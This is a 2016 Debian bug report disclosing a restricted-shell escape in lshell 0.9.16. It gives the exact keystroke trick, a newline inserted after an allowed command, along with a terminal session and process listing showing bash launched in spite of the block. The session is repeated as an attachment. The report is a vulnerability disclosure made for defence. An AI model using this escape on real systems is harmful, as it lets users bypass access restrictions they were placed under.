Package: lshell Version: 0.9.16-1 Severity: grave Tags: security upstream Justification: user security hole
Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit From: Vladislav Yarmak <yarmak.vladis...@gmail.com> To: Debian Bug Tracking System <sub...@bugs.debian.org> Subject: lshell: Shell outbreak with multiline commands Message-ID: <20160820194404.1737.15528.reportbug@debian> X-Mailer: reportbug 6.6.3 Date: Sat, 20 Aug 2016 22:44:04 +0300 X-Debbugs-Cc: Debian Security Team <t...@security.debian.org>, Debian Testing Security Team <secure-testing-t...@lists.alioth.debian.org> Package: lshell Version: 0.9.16-1 Severity: grave Tags: security upstream Justification: user security hole Just type <CTRL+V><CTRL+J> after any allowed command and then type desired restricted command: root@debian:~# getent passwd testuser testuser:x:1001:1001:,,,:/home/testuser:/usr/bin/lshell root@debian:~# su - testuser You are in a limited shell. Type '?' or 'help' to get the list of allowed commands testuser:~$ ? cd clear echo exit help history ll lpath ls lsudo testuser:~$ bash *** forbidden command: bash testuser:~$ echo bash testuser@debian:~$ ps -f UID PID PPID C STIME TTY TIME CMD testuser 1641 1640 0 22:27 pts/1 00:00:00 /usr/bin/python /usr/bin/lshell testuser 1642 1641 0 22:27 pts/1 00:00:00 sh -c set -m; echo bash testuser 1643 1642 0 22:27 pts/1 00:00:00 bash testuser 1648 1643 0 22:27 pts/1 00:00:00 ps -f Problem exists in current upstream code. There are opened issue on Github but no reaction yet: https://github.com/ghantoos/lshell/issues/149. Command parser in this shell is beyound of recovery. I recommend to replace this shell with symlink to /usr/sbin/nologin. -- System Information: Debian Release: 8.5 APT prefers stable-updates APT policy: (500, 'stable-updates'), (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 3.16.0-4-amd64 (SMP w/2 CPU cores) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Init: systemd (via /run/systemd/system) Versions of packages lshell depends on: ii adduser 3.113+nmu3 ii python 2.7.9-1 lshell recommends no packages. lshell suggests no packages. -- no debconf information *** outbreak.txt root@debian:~# getent passwd testuser testuser:x:1001:1001:,,,:/home/testuser:/usr/bin/lshell root@debian:~# su - testuser You are in a limited shell. Type '?' or 'help' to get the list of allowed commands testuser:~$ ? cd clear echo exit help history ll lpath ls lsudo testuser:~$ bash *** forbidden command: bash testuser:~$ echo bash testuser@debian:~$ ps -f UID PID PPID C STIME TTY TIME CMD testuser 1641 1640 0 22:27 pts/1 00:00:00 /usr/bin/python /usr/bin/lshell testuser 1642 1641 0 22:27 pts/1 00:00:00 sh -c set -m; echo bash testuser 1643 1642 0 22:27 pts/1 00:00:00 bash testuser 1648 1643 0 22:27 pts/1 00:00:00 ps -f -- System Information: Debian Release: 8.5 APT prefers stable-updates APT policy: (500, 'stable-updates'), (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 3.16.0-4-amd64 (SMP w/2 CPU cores) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Init: systemd (via /run/systemd/system) Versions of packages lshell depends on: ii adduser 3.113+nmu3 ii python 2.7.9-1 lshell recommends no packages. lshell suggests no packages. -- no debconf information
